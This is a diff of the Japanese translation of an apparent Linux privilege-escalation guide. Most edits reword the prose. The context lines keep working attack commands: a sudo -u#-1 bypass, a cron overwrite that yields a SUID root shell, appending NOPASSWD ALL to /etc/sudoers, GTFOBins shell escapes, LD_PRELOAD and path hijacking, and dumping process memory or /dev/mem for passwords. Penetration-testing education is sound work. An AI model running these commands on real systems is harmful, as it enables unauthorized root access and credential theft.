+常に**Googleでカーネルバージョンを検索**してください。おそらくあなたのカーネルバージョンがいくつかのカーネル脆弱性に記載されており、その場合、その脆弱性が有効であることが確認できます。
 
 ### CVE-2016-5195 (DirtyCow)
 
@@ -73,7 +73,7 @@ From @sickrov
 ```
 sudo -u#-1 /bin/bash
 ```
-### Dmesg署名の検証に失敗しました
+### Dmesg署名検証に失敗しました
 
 **smasher2 box of HTB**の**例**を確認して、この脆弱性がどのように悪用されるかを見てください。
 ```bash
@@ -144,7 +144,7 @@ grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc
 ```bash
 which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null
 ```
-また、**コンパイラがインストールされているかどうかを確認してください**。これは、カーネルエクスプロイトを使用する必要がある場合に便利です。使用するマシン(または類似のマシン)でコンパイルすることが推奨されます。
+また、**任意のコンパイラがインストールされているか確認してください**。これは、カーネルエクスプロイトを使用する必要がある場合に便利です。使用するマシン(または類似のマシン)でコンパイルすることが推奨されます。
 ```bash
 (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/")
 ```
@@ -162,13 +162,13 @@ SSHアクセスがある場合、**openVAS**を使用して、マシンにイン
 
 ## プロセス
 
-実行中の**プロセス**を確認し、どのプロセスが**必要以上の特権を持っているか**をチェックしてください(例えば、rootによって実行されているtomcatなど)。
+実行中の**プロセス**を確認し、**権限が過剰なプロセス**がないかチェックしてください(例えば、rootによって実行されているtomcatなど)。
 ```bash
 ps aux
 ps -ef
 top -n 1
 ```
-常に可能な [**electron/cef/chromiumデバッガー**] が実行されているか確認してください。これを悪用して特権を昇格させることができます。 **Linpeas** はプロセスのコマンドライン内の `--inspect` パラメータをチェックすることでそれらを検出します。\
+常に可能な [**electron/cef/chromiumデバッガー**]が実行されているか確認してください。これを悪用して特権を昇格させることができます](electron-cef-chromium-debugger-abuse.md)。 **Linpeas** は、プロセスのコマンドライン内の `--inspect` パラメータをチェックすることでそれらを検出します。\
 また、**プロセスのバイナリに対する権限を確認してください**。誰かを上書きできるかもしれません。
 
 ### プロセス監視
@@ -177,23 +177,23 @@ top -n 1
 
 ### プロセスメモリ
 
-サーバーのいくつかのサービスは、**メモリ内に平文で資格情報を保存します**。\
+サーバーの一部のサービスは、**メモリ内に平文で資格情報を保存します**。\
 通常、他のユーザーに属するプロセスのメモリを読むには**root権限**が必要です。したがって、これは通常、すでにrootであり、さらに多くの資格情報を発見したいときにより有用です。\
 ただし、**通常のユーザーとしては、自分が所有するプロセスのメモリを読むことができることを忘れないでください**。
 
 > [!WARNING]
 > 現在、ほとんどのマシンは**デフォルトでptraceを許可していない**ため、特権のないユーザーに属する他のプロセスをダンプすることはできません。
 >
-> ファイル _**/proc/sys/kernel/yama/ptrace_scope**_ はptraceのアクセス可能性を制御します:
+> ファイル _**/proc/sys/kernel/yama/ptrace_scope**_ は、ptraceのアクセス可能性を制御します:
 >
-> - **kernel.yama.ptrace_scope = 0**: 同じuidを持つすべてのプロセスをデバッグできます。これがptracingが機能していた古典的な方法です。
+> - **kernel.yama.ptrace_scope = 0**: 同じuidを持つ限り、すべてのプロセスをデバッグできます。これがptracingが機能していた古典的な方法です。
 > - **kernel.yama.ptrace_scope = 1**: 親プロセスのみがデバッグできます。
 > - **kernel.yama.ptrace_scope = 2**: 管理者のみがptraceを使用できます。これはCAP_SYS_PTRACE権限が必要です。
 > - **kernel.yama.ptrace_scope = 3**: ptraceでトレースできるプロセスはありません。一度設定されると、ptracingを再度有効にするには再起動が必要です。
 
 #### GDB
 
-FTPサービスのメモリにアクセスできる場合(例えば)、ヒープを取得し、その資格情報の中を検索することができます。
+FTPサービスのメモリにアクセスできる場合(例えば)、ヒープを取得し、その資格情報を内部で検索することができます。
 ```bash
 gdb -p 
 (gdb) info proc mappings
@@ -230,7 +230,7 @@ rm $1*.bin
 ```
 #### /dev/mem
 
-`/dev/mem` はシステムの **物理** メモリへのアクセスを提供し、仮想メモリにはアクセスしません。カーネルの仮想アドレス空間は /dev/kmem を使用してアクセスできます。\
+`/dev/mem` はシステムの **物理** メモリへのアクセスを提供し、仮想メモリではありません。カーネルの仮想アドレス空間は /dev/kmem を使用してアクセスできます。\
 通常、`/dev/mem` は **root** と **kmem** グループのみに読み取り可能です。
 ```
 strings /dev/mem -n10 | grep -i PASS
@@ -266,10 +266,10 @@ Press Ctrl-C to end monitoring without terminating the process.
 ```
 ### ツール
 
-プロセスのメモリをダンプするには、次のツールを使用できます:
+プロセスのメモリをダンプするには、次のものを使用できます:
 
 - [**https://github.com/Sysinternals/ProcDump-for-Linux**](https://github.com/Sysinternals/ProcDump-for-Linux)
-- [**https://github.com/hajzer/bash-memory-dump**](https://github.com/hajzer/bash-memory-dump) (root) - \_ルート要件を手動で削除し、自分が所有するプロセスをダンプできます
+- [**https://github.com/hajzer/bash-memory-dump**](https://github.com/hajzer/bash-memory-dump) (root) - \_ルート要件を手動で削除し、あなたが所有するプロセスをダンプできます
 - [**https://www.delaat.net/rp/2016-2017/p97/report.pdf**](https://www.delaat.net/rp/2016-2017/p97/report.pdf) のスクリプト A.5 (root が必要)
 
 ### プロセスメモリからの資格情報
@@ -288,16 +288,16 @@ strings *.dump | grep -i password
 ```
 #### mimipenguin
 
-ツール [**https://github.com/huntergregal/mimipenguin**](https://github.com/huntergregal/mimipenguin) は **メモリから平文の認証情報を盗む** ことができ、いくつかの **よく知られたファイル** からも情報を取得します。正しく動作するには root 権限が必要です。
+ツール [**https://github.com/huntergregal/mimipenguin**](https://github.com/huntergregal/mimipenguin) は **メモリから平文の認証情報を盗む** と **いくつかのよく知られたファイル** から情報を取得します。正しく動作するには root 権限が必要です。
 
-| 機能                                             | プロセス名           |
-| ------------------------------------------------ | -------------------- |
-| GDM パスワード (Kali デスクトップ, Debian デスクトップ) | gdm-password         |
-| Gnome キーチェーン (Ubuntu デスクトップ, ArchLinux デスクトップ) | gnome-keyring-daemon |
-| LightDM (Ubuntu デスクトップ)                    | lightdm              |
-| VSFTPd (アクティブ FTP 接続)                     | vsftpd               |
-| Apache2 (アクティブ HTTP ベーシック認証セッション)   | apache2              |
-| OpenSSH (アクティブ SSH セッション - Sudo 使用)    | sshd:                |
+| 機能                                             | プロセス名            |
+| ------------------------------------------------ | --------------------- |
+| GDM パスワード (Kali デスクトップ、Debian デスクトップ) | gdm-password          |
+| Gnome Keyring (Ubuntu デスクトップ、ArchLinux デスクトップ) | gnome-keyring-daemon  |
+| LightDM (Ubuntu デスクトップ)                     | lightdm               |
+| VSFTPd (アクティブ FTP 接続)                      | vsftpd                |
+| Apache2 (アクティブ HTTP ベーシック認証セッション)   | apache2               |
+| OpenSSH (アクティブ SSH セッション - Sudo 使用)     | sshd:                 |
 
 #### Search Regexes/[truffleproc](https://github.com/controlplaneio/truffleproc)
 ```bash
@@ -323,12 +323,12 @@ cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/nul
 ```
 ### Cron path
 
-例えば、_/etc/crontab_ の中に次のような PATH が見つかります: _PATH=**/home/user**:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin_
+例えば、_ /etc/crontab _の中にPATHが見つかります: _PATH=**/home/user**:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin_
 
-(_ユーザー "user" が /home/user に対して書き込み権限を持っていることに注意してください_)
+(_ユーザー"user"が/home/userに対して書き込み権限を持っていることに注意してください_)
 
-この crontab の中で、root ユーザーがパスを設定せずにコマンドやスクリプトを実行しようとすると、例えば: _\* \* \* \* root overwrite.sh_\
-その場合、次のようにして root シェルを取得できます:
+このcrontabの中で、rootユーザーがパスを設定せずにコマンドやスクリプトを実行しようとするとします。例えば: _\* \* \* \* root overwrite.sh_\
+その場合、次のようにしてrootシェルを取得できます:
 ```bash
 echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
 #Wait cron job to be executed
@@ -336,7 +336,7 @@ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
 ```
 ### Cron using a script with a wildcard (Wildcard Injection)
 
-もしルートによって実行されるスクリプトがコマンド内に「**\***」を含んでいる場合、これを利用して予期しないこと(例えば、特権昇格)を引き起こすことができます。例:
+もしルートによって実行されるスクリプトがコマンド内に“**\***”を含んでいる場合、これを利用して予期しないこと(例えば、権限昇格)を引き起こすことができます。例:
 ```bash
 rsync -a *.sh rsync://host.back/src/rbd #You can create a file called "-e sh myscript.sh" so the script will execute our script
 ```
@@ -362,7 +362,7 @@ ln -d -s  
 ```
 ### Frequent cron jobs
 
-1分ごと、2分ごと、または5分ごとに実行されているプロセスを検索するためにプロセスを監視できます。これを利用して特権を昇格させることができるかもしれません。
+1分ごと、2分ごと、または5分ごとに実行されるプロセスを検索するためにプロセスを監視できます。これを利用して特権を昇格させることができるかもしれません。
 
 例えば、**1分間に0.1秒ごとに監視**し、**実行回数が少ないコマンドでソート**し、最も実行されたコマンドを削除するには、次のようにします:
 ```bash
@@ -419,14 +419,14 @@ Unit=backdoor.service
 ```
 ドキュメントでは、Unitについて次のように説明されています:
 
-> このタイマーが経過したときにアクティブにするユニット。引数はユニット名で、接尾辞は「.timer」ではありません。指定されていない場合、この値はタイマーユニットと同じ名前のサービスにデフォルト設定されます(上記を参照)。アクティブにされるユニット名とタイマーユニットのユニット名は、接尾辞を除いて同一の名前にすることが推奨されます。
+> このタイマーが経過したときにアクティブにするユニット。引数はユニット名で、接尾辞は「.timer」ではありません。指定されていない場合、この値は接尾辞を除いたタイマー単位と同じ名前のサービスにデフォルト設定されます。(上記を参照。)アクティブにされるユニット名とタイマー単位のユニット名は、接尾辞を除いて同一の名前にすることが推奨されます。
 
 したがって、この権限を悪用するには、次のことが必要です:
 
 - **書き込み可能なバイナリを実行している**systemdユニット(例えば、`.service`)を見つける
 - **相対パスを実行している**systemdユニットを見つけ、**systemd PATH**に対して**書き込み権限**を持つ(その実行可能ファイルを偽装するため)
 
-**`man systemd.timer`でタイマーについて詳しく学びましょう。**
+**タイマーについて詳しくは `man systemd.timer` を参照してください。**
 
 ### **タイマーの有効化**
 
@@ -443,22 +443,22 @@ Unixドメインソケット(UDS)は、クライアント-サーバーモデ
 
 ソケットは`.socket`ファイルを使用して構成できます。
 
-**`man systemd.socket`でソケットについてさらに学びましょう。** このファイル内では、いくつかの興味深いパラメータを設定できます:
+**`man systemd.socket`でソケットについてさらに学ぶ。** このファイル内では、いくつかの興味深いパラメータを設定できます:
 
 - `ListenStream`, `ListenDatagram`, `ListenSequentialPacket`, `ListenFIFO`, `ListenSpecial`, `ListenNetlink`, `ListenMessageQueue`, `ListenUSBFunction`: これらのオプションは異なりますが、**ソケットがリッスンする場所を示すために要約が使用されます**(AF_UNIXソケットファイルのパス、リッスンするIPv4/6および/またはポート番号など)。
-- `Accept`: ブール引数を取ります。**true**の場合、**各接続ごとにサービスインスタンスが生成され**、接続ソケットのみがそれに渡されます。**false**の場合、すべてのリッスンソケット自体が**開始されたサービスユニットに渡され**、すべての接続に対して1つのサービスユニットが生成されます。この値は、単一のサービスユニットがすべての受信トラフィックを無条件に処理するデータグラムソケットおよびFIFOでは無視されます。**デフォルトはfalse**です。パフォーマンスの理由から、`Accept=no`に適した方法でのみ新しいデーモンを書くことを推奨します。
+- `Accept`: ブール引数を取ります。**true**の場合、**各接続ごとにサービスインスタンスが生成され**、接続ソケットのみがそれに渡されます。**false**の場合、すべてのリッスンソケット自体が**開始されたサービスユニットに渡され**、すべての接続に対して1つのサービスユニットが生成されます。この値は、単一のサービスユニットがすべての受信トラフィックを無条件に処理するデータグラムソケットおよびFIFOでは無視されます。**デフォルトはfalse**です。パフォーマンスの理由から、`Accept=no`に適した方法でのみ新しいデーモンを書くことが推奨されます。
 - `ExecStartPre`, `ExecStartPost`: リッスンする**ソケット**/FIFOが**作成**され、バインドされる前または後に**実行される**1つ以上のコマンドラインを取ります。コマンドラインの最初のトークンは絶対ファイル名でなければならず、その後にプロセスの引数が続きます。
 - `ExecStopPre`, `ExecStopPost`: リッスンする**ソケット**/FIFOが**閉じられ**、削除される前または後に**実行される**追加の**コマンド**です。
-- `Service`: **受信トラフィック**で**アクティブ化**する**サービス**ユニット名を指定します。この設定は、Accept=noのソケットにのみ許可されます。デフォルトでは、ソケットと同じ名前のサービス(サフィックスが置き換えられたもの)になります。ほとんどの場合、このオプションを使用する必要はありません。
+- `Service`: **受信トラフィック**で**アクティブ化する**サービスユニット名を指定します。この設定は、Accept=noのソケットにのみ許可されます。デフォルトでは、ソケットと同じ名前のサービス(接尾辞が置き換えられたもの)になります。ほとんどの場合、このオプションを使用する必要はありません。
 
 ### 書き込み可能な.socketファイル
 
-**書き込み可能な**`.socket`ファイルを見つけた場合、`[Socket]`セクションの最初に`ExecStartPre=/home/kali/sys/backdoor`のようなものを**追加**できます。そうすると、ソケットが作成される前にバックドアが実行されます。したがって、**おそらくマシンが再起動するまで待つ必要があります。**\
+**書き込み可能な**`.socket`ファイルを見つけた場合、`[Socket]`セクションの最初に`ExecStartPre=/home/kali/sys/backdoor`のようなものを**追加**することができ、ソケットが作成される前にバックドアが実行されます。したがって、**マシンが再起動されるまで待つ必要があるでしょう。**\
 _システムがそのソケットファイル構成を使用している必要があり、さもなければバックドアは実行されません_
 
 ### 書き込み可能なソケット
 
-**書き込み可能なソケットを特定した場合**(_ここではUnixソケットについて話しており、構成`.socket`ファイルについては話していません_)、そのソケットと**通信することができ**、おそらく脆弱性を悪用することができます。
+**書き込み可能なソケットを特定した場合**(_ここではUnixソケットについて話しており、構成`.socket`ファイルについてではありません_)、そのソケットと**通信することができ**、おそらく脆弱性を悪用することができます。
 
 ### Unixソケットの列挙
 ```bash
@@ -473,7 +473,8 @@ nc -uU /tmp/socket #Connect to UNIX-domain datagram socket
 #apt-get install socat
 socat - UNIX-CLIENT:/dev/socket #connect to UNIX-domain socket, irrespective of its type
 ```
-**エクスプロイトの例:**
+**エクスプロイトの例:**
+
 
 {{#ref}}
 socket-command-injection.md
@@ -481,15 +482,15 @@ socket-command-injection.md
 
 ### HTTPソケット
 
-HTTPリクエストをリッスンしている**ソケット**がいくつか存在する可能性があります(_私は.socketファイルではなく、Unixソケットとして機能するファイルについて話しています_)。これを確認するには、次のコマンドを使用できます:
+HTTPリクエストをリッスンしている**ソケット**がいくつか存在する可能性があります(_私は.socketファイルではなく、Unixソケットとして機能するファイルについて話しています_)。これを確認するには、次のコマンドを使用できます:
 ```bash
 curl --max-time 2 --unix-socket /pat/to/socket/files http:/index
 ```
-もしソケットが**HTTP**リクエストで**応答**する場合、あなたはそれと**通信**でき、場合によっては**脆弱性を悪用**できるかもしれません。
+もしソケットが**HTTP**リクエストで**応答**する場合、あなたはそれと**通信**でき、場合によっては**いくつかの脆弱性を悪用**できるかもしれません。
 
 ### 書き込み可能なDockerソケット
 
-Dockerソケットは、通常`/var/run/docker.sock`にあり、保護すべき重要なファイルです。デフォルトでは、`root`ユーザーと`docker`グループのメンバーが書き込み可能です。このソケットへの書き込みアクセスを持つことは、特権昇格につながる可能性があります。これを行う方法と、Docker CLIが利用できない場合の代替手段を以下に示します。
+Dockerソケットは、通常`/var/run/docker.sock`に見られる重要なファイルであり、保護されるべきです。デフォルトでは、`root`ユーザーと`docker`グループのメンバーが書き込み可能です。このソケットへの書き込みアクセスを持つことは、特権昇格につながる可能性があります。これを行う方法と、Docker CLIが利用できない場合の代替手段を以下に示します。
 
 #### **Docker CLIを使用した特権昇格**
 
@@ -538,7 +539,7 @@ Upgrade: tcp
 
 **`docker`グループ内にいるためにdockerソケットに対する書き込み権限がある場合、** [**特権を昇格させる方法がさらにあります**](interesting-groups-linux-pe/index.html#docker-group)ので注意してください。もし[**docker APIがポートでリスニングしている場合、妥協することも可能です**](../../network-services-pentesting/2375-pentesting-docker.md#compromising)。
 
-**dockerから脱出する方法やそれを悪用して特権を昇格させる方法をさらに確認してください**:
+**dockerから脱出する方法やそれを悪用して特権を昇格させる方法については、以下を確認してください:**
 
 {{#ref}}
 docker-security/
@@ -546,7 +547,7 @@ docker-security/
 
 ## Containerd (ctr) 特権昇格
 
-**`ctr`**コマンドを使用できる場合は、**特権を昇格させるために悪用できる可能性があるため、以下のページを読んでください**:
+**`ctr`** コマンドを使用できる場合は、以下のページを読んでください。**特権を昇格させるために悪用できる可能性があります**:
 
 {{#ref}}
 containerd-ctr-privilege-escalation.md
@@ -554,7 +555,7 @@ containerd-ctr-privilege-escalation.md
 
 ## **RunC** 特権昇格
 
-**`runc`**コマンドを使用できる場合は、**特権を昇格させるために悪用できる可能性があるため、以下のページを読んでください**:
+**`runc`** コマンドを使用できる場合は、以下のページを読んでください。**特権を昇格させるために悪用できる可能性があります**:
 
 {{#ref}}
 runc-privilege-escalation.md
@@ -564,13 +565,13 @@ runc-privilege-escalation.md
 
 D-Busは、アプリケーションが効率的に相互作用し、データを共有できる高度な**プロセス間通信(IPC)システム**です。現代のLinuxシステムを念頭に設計されており、さまざまな形式のアプリケーション通信のための堅牢なフレームワークを提供します。
 
-このシステムは多用途で、プロセス間のデータ交換を強化する基本的なIPCをサポートし、**強化されたUNIXドメインソケット**を思わせます。さらに、イベントや信号をブロードキャストするのを助け、システムコンポーネント間のシームレスな統合を促進します。たとえば、Bluetoothデーモンからの着信コールに関する信号は、音楽プレーヤーをミュートさせ、ユーザーエクスペリエンスを向上させることができます。加えて、D-Busはリモートオブジェクトシステムをサポートし、アプリケーション間のサービスリクエストやメソッド呼び出しを簡素化し、従来は複雑だったプロセスを効率化します。
+このシステムは多用途で、プロセス間のデータ交換を強化する基本的なIPCをサポートし、**強化されたUNIXドメインソケット**を思わせます。さらに、イベントや信号をブロードキャストするのを助け、システムコンポーネント間のシームレスな統合を促進します。たとえば、Bluetoothデーモンからの着信コールに関する信号は、音楽プレーヤーをミュートさせ、ユーザー体験を向上させることができます。加えて、D-Busはリモートオブジェクトシステムをサポートし、アプリケーション間のサービスリクエストやメソッド呼び出しを簡素化し、従来は複雑だったプロセスを効率化します。
 
-D-Busは**許可/拒否モデル**で動作し、メッセージの権限(メソッド呼び出し、信号の送信など)を、ポリシールールの一致の累積効果に基づいて管理します。これらのポリシーはバスとの相互作用を指定し、これらの権限の悪用を通じて特権昇格を許可する可能性があります。
+D-Busは**許可/拒否モデル**で動作し、メッセージの権限(メソッド呼び出し、信号の送信など)を、ポリシールールの累積的な効果に基づいて管理します。これらのポリシーはバスとの相互作用を指定し、これらの権限の悪用を通じて特権昇格を可能にする場合があります。
 
 `/etc/dbus-1/system.d/wpa_supplicant.conf`にあるそのようなポリシーの例が提供されており、rootユーザーが`fi.w1.wpa_supplicant1`からメッセージを所有、送信、受信するための権限が詳細に記載されています。
 
-指定されたユーザーやグループのないポリシーは普遍的に適用され、"デフォルト"コンテキストポリシーは他の特定のポリシーにカバーされていないすべてに適用されます。
+ユーザーまたはグループが指定されていないポリシーは普遍的に適用され、"default"コンテキストポリシーは他の特定のポリシーでカバーされていないすべてに適用されます。
 ```xml
 
 
@@ -579,7 +580,8 @@ D-Busは**許可/拒否モデル**で動作し、メッセージの権限(メ
 
 
 ```
-**D-Bus通信を列挙し、悪用する方法をここで学びましょう:**
+**D-Bus通信を列挙し、悪用する方法をここで学びましょう:**
+
 
 {{#ref}}
 d-bus-enumeration-and-command-injection-privilege-escalation.md
@@ -658,7 +660,8 @@ gpg --list-keys 2>/dev/null
 
 ### Groups
 
-ルート特権を付与する可能性のある**グループのメンバー**であるか確認してください:
+あなたがルート権限を付与する可能性のある**グループのメンバー**であるか確認してください:
+
 
 {{#ref}}
 interesting-groups-linux-pe/
@@ -683,27 +686,27 @@ grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/logi
 ```
 ### 知られているパスワード
 
-もし**環境のパスワードを知っている場合**は、そのパスワードを使って**各ユーザーとしてログインを試みてください**。
+もし**環境のパスワードを知っている**場合は、**各ユーザーとしてログインを試みてください**。
 
 ### Su Brute
 
-多くのノイズを出すことを気にしない場合、`su`と`timeout`バイナリがコンピュータに存在するなら、[su-bruteforce](https://github.com/carlospolop/su-bruteforce)を使ってユーザーをブルートフォースすることができます。\
+多くのノイズを出すことを気にしない場合、`su`と`timeout`バイナリがコンピュータに存在するなら、[su-bruteforce](https://github.com/carlospolop/su-bruteforce)を使用してユーザーをブルートフォースすることができます。\
 [**Linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)の`-a`パラメータもユーザーをブルートフォースしようとします。
 
 ## 書き込み可能なPATHの悪用
 
 ### $PATH
 
-もし**$PATHのいくつかのフォルダ内に書き込むことができる**ことがわかった場合、**書き込み可能なフォルダ内にバックドアを作成することによって特権を昇格させる**ことができるかもしれません。そのバックドアは、異なるユーザー(理想的にはroot)によって実行されるコマンドの名前であり、**あなたの書き込み可能なフォルダよりも前に位置するフォルダからは読み込まれない**必要があります。
+もし**$PATHのいくつかのフォルダ内に書き込むことができる**ことがわかった場合、**書き込み可能なフォルダ内にバックドアを作成することによって特権を昇格させる**ことができるかもしれません。そのバックドアは、異なるユーザー(理想的にはroot)によって実行されるコマンドの名前であり、**$PATH内のあなたの書き込み可能なフォルダよりも前に位置するフォルダからは読み込まれない**必要があります。
 
 ### SUDOとSUID
 
-sudoを使用していくつかのコマンドを実行することが許可されているか、suidビットが設定されている可能性があります。それを確認するには:
+sudoを使用していくつかのコマンドを実行することが許可されているか、suidビットを持っている可能性があります。それを確認するには:
 ```bash
 sudo -l #Check commands you can execute with sudo
 find / -perm -4000 2>/dev/null #Find all SUID binaries
 ```
-一部の**予期しないコマンドは、ファイルを読み書きしたり、コマンドを実行したりすることを許可します。** 例えば:
+一部の**予期しないコマンドは、ファイルを読み書きしたり、コマンドを実行したりすることを可能にします。** 例えば:
 ```bash
 sudo awk 'BEGIN {system("/bin/sh")}'
 sudo find /etc -exec sh -i \;
@@ -714,7 +717,7 @@ less>! 
 ```
 ### NOPASSWD
 
-Sudoの設定により、ユーザーはパスワードを知らなくても他のユーザーの権限でコマンドを実行できる場合があります。
+Sudoの設定により、ユーザーは他のユーザーの権限でパスワードを知らなくてもコマンドを実行できる場合があります。
 ```
 $ sudo -l
 User demo may run the following commands on crashlab:
@@ -748,7 +751,7 @@ less>:e /etc/shadow #Jump to read other files using privileged less
 ln /etc/shadow /var/log/new
 sudo less /var/log/new #Use symlinks to read any file
 ```
-ワイルドカード(*)が使用されると、さらに簡単になります:
+ワイルドカード(\*)が使用されると、さらに簡単になります:
 ```bash
 sudo less /var/log/../../etc/shadow #Read shadow
 sudo less /var/log/something /etc/shadow #Red 2 files
@@ -776,18 +779,18 @@ sudo less
 function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
 export -f /usr/sbin/service
 ```
-そのため、suidバイナリを呼び出すと、この関数が実行されます。
+その後、suidバイナリを呼び出すと、この関数が実行されます。
 
 ### LD_PRELOAD & **LD_LIBRARY_PATH**
 
-**LD_PRELOAD** 環境変数は、ローダーによって他のすべてのライブラリ、標準Cライブラリ(`libc.so`)を含む前に読み込まれる1つ以上の共有ライブラリ(.soファイル)を指定するために使用されます。このプロセスはライブラリのプリロードとして知られています。
+**LD_PRELOAD** 環境変数は、ローダーによって他のすべてのライブラリ、標準Cライブラリ(`libc.so`を含む)よりも前にロードされる1つ以上の共有ライブラリ(.soファイル)を指定するために使用されます。このプロセスはライブラリのプリロードとして知られています。
 
-しかし、システムのセキュリティを維持し、この機能が悪用されるのを防ぐために、特に **suid/sgid** 実行可能ファイルに対して、システムはいくつかの条件を強制します:
+しかし、システムのセキュリティを維持し、この機能が特に**suid/sgid**実行可能ファイルで悪用されるのを防ぐために、システムはいくつかの条件を強制します:
 
-- ローダーは、実ユーザーID (_ruid_) が有効ユーザーID (_euid_) と一致しない実行可能ファイルに対して **LD_PRELOAD** を無視します。
-- suid/sgid の実行可能ファイルに対しては、suid/sgid でもある標準パスのライブラリのみがプリロードされます。
+- ローダーは、実ユーザーID(_ruid_)が有効ユーザーID(_euid_)と一致しない実行可能ファイルに対して**LD_PRELOAD**を無視します。
+- suid/sgidの実行可能ファイルに対しては、suid/sgidである標準パスのライブラリのみがプリロードされます。
 
-特権昇格は、`sudo` でコマンドを実行する能力があり、`sudo -l` の出力に **env_keep+=LD_PRELOAD** という文が含まれている場合に発生する可能性があります。この構成により、**LD_PRELOAD** 環境変数が持続し、`sudo` でコマンドが実行されるときにも認識されるため、特権のある状態で任意のコードが実行される可能性があります。
+特権昇格は、`sudo`でコマンドを実行する能力があり、`sudo -l`の出力に**env_keep+=LD_PRELOAD**という文が含まれている場合に発生する可能性があります。この構成により、**LD_PRELOAD** 環境変数が持続し、`sudo`でコマンドが実行されるときにも認識されるため、特権のある状態で任意のコードが実行される可能性があります。
 ```
 Defaults        env_keep += LD_PRELOAD
 ```
@@ -842,7 +845,7 @@ strace  2>&1 | grep -i -E "open|access|no such file"
 ```
 例えば、_“open(“/path/to/.config/libcalc.so”, O_RDONLY) = -1 ENOENT (そのようなファイルやディレクトリはありません)”_ のようなエラーに遭遇することは、悪用の可能性を示唆しています。
 
-これを悪用するには、_"/path/to/.config/libcalc.c"_ というCファイルを作成し、次のコードを含めることになります:
+これを悪用するには、_"/path/to/.config/libcalc.c"_ というCファイルを作成し、以下のコードを含めることになります:
 ```c
 #include 
 #include 
@@ -892,9 +895,9 @@ system("/bin/bash -p");
 
 ### GTFOBins
 
-[**GTFOBins**](https://gtfobins.github.io) は、攻撃者がローカルのセキュリティ制限を回避するために悪用できるUnixバイナリのキュレーションされたリストです。[**GTFOArgs**](https://gtfoargs.github.io/) は、コマンドに**引数のみを注入できる**場合の同様のリストです。
+[**GTFOBins**](https://gtfobins.github.io) は、攻撃者がローカルのセキュリティ制限を回避するために悪用できるUnixバイナリのキュレーションされたリストです。 [**GTFOArgs**](https://gtfoargs.github.io/) は、コマンドに**引数のみを注入できる**場合のためのものです。
 
-このプロジェクトは、制限されたシェルから抜け出し、特権を昇格または維持し、ファイルを転送し、バインドおよびリバースシェルを生成し、他のポストエクスプロイテーションタスクを容易にするために悪用できるUnixバイナリの正当な関数を収集します。
+このプロジェクトは、制限されたシェルから抜け出し、特権を昇格または維持し、ファイルを転送し、バインドおよびリバースシェルを生成し、その他のポストエクスプロイトタスクを容易にするために悪用できるUnixバイナリの正当な関数を収集します。
 
 > gdb -nx -ex '!sh' -ex quit\
 > sudo mysql -e '! /bin/sh'\
@@ -911,7 +914,7 @@ https://gtfoargs.github.io/
 
 ### FallOfSudo
 
-`sudo -l` にアクセスできる場合、ツール [**FallOfSudo**](https://github.com/CyberOne-Security/FallofSudo) を使用して、任意のsudoルールを悪用する方法を見つけることができます。
+`sudo -l` にアクセスできる場合、ツール [**FallOfSudo**](https://github.com/CyberOne-Security/FallofSudo) を使用して、任意のsudoルールを悪用する方法を見つけられるかどうかを確認できます。
 
 ### Sudoトークンの再利用
 
@@ -920,7 +923,7 @@ https://gtfoargs.github.io/
 特権を昇格させるための要件:
 
 - "_sampleuser_" としてシェルを持っている
-- "_sampleuser_" が**過去15分間に `sudo`** を使用して何かを実行している(デフォルトでは、これはパスワードを入力せずに `sudo` を使用できるsudoトークンの期間です)
+- "_sampleuser_" が**過去15分間に `sudo`**を使用して何かを実行している(デフォルトでは、これはパスワードを入力せずに `sudo` を使用できるsudoトークンの期間です)
 - `cat /proc/sys/kernel/yama/ptrace_scope` が 0 である
 - `gdb` にアクセス可能である(アップロードできる必要があります)
 
@@ -954,12 +957,12 @@ sudo su
 ### /etc/sudoers, /etc/sudoers.d
 
 ファイル `/etc/sudoers` と `/etc/sudoers.d` 内のファイルは、誰が `sudo` を使用できるか、そしてその方法を設定します。これらのファイルは **デフォルトではユーザー root とグループ root のみが読み取ることができます**。\
-**もし** このファイルを **読む** ことができれば、**興味深い情報を取得できる** かもしれません。また、**もし** どのファイルでも **書き込む** ことができれば、**特権を昇格させる** ことができるでしょう。
+**もし** このファイルを **読む** ことができれば、**興味深い情報を取得できる** 可能性があります。また、**もし** どのファイルでも **書き込む** ことができれば、**特権を昇格させる** ことができるでしょう。
 ```bash
 ls -l /etc/sudoers /etc/sudoers.d/
 ls -ld /etc/sudoers.d/
 ```
-この権限を悪用することができます。
+書き込みができれば、この権限を悪用できます。
 ```bash
 echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers
 echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers.d/README
@@ -979,9 +982,9 @@ permit nopass demo as root cmd vim
 ```
 ### Sudo Hijacking
 
-もし**ユーザーが通常マシンに接続し、`sudo`を使用して特権を昇格させる**ことを知っていて、そのユーザーコンテキスト内でシェルを取得した場合、**新しいsudo実行可能ファイルを作成**して、あなたのコードをrootとして実行し、その後ユーザーのコマンドを実行させることができます。そして、**ユーザーコンテキストの$PATHを変更**します(例えば、.bash_profileに新しいパスを追加するなど)ので、ユーザーがsudoを実行すると、あなたのsudo実行可能ファイルが実行されます。
